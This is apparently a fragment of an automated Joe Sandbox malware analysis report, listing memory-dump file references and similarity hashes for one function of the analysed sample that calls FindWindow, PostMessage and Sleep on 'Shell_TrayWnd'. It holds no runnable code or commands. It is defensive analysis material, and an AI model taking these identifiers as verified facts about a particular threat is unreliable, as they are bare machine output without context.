                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: FindMessagePostSleepWindow
                                                  • String ID: Shell_TrayWnd
                                                  • API String ID: 529655941-2988720461
                                                  • Opcode ID: 301b0d48ea2e924cf9b414fcde007e13b40137fc9fa6d7d6e5ad3d994111680c
                                                  • Instruction ID: 4f705d9df29c3b3f1aaeb19abe42952c21adacf0e98ba26bb706e57dcde4b1a8
                                                  • Opcode Fuzzy Hash: 301b0d48ea2e924cf9b414fcde007e13b40137fc9fa6d7d6e5ad3d994111680c
                                                  • Instruction Fuzzy Hash: 0FD0C935784311B7E7A4BB709C5BF9A6A14BB00B51F000839B649AA1D0D9E09845C754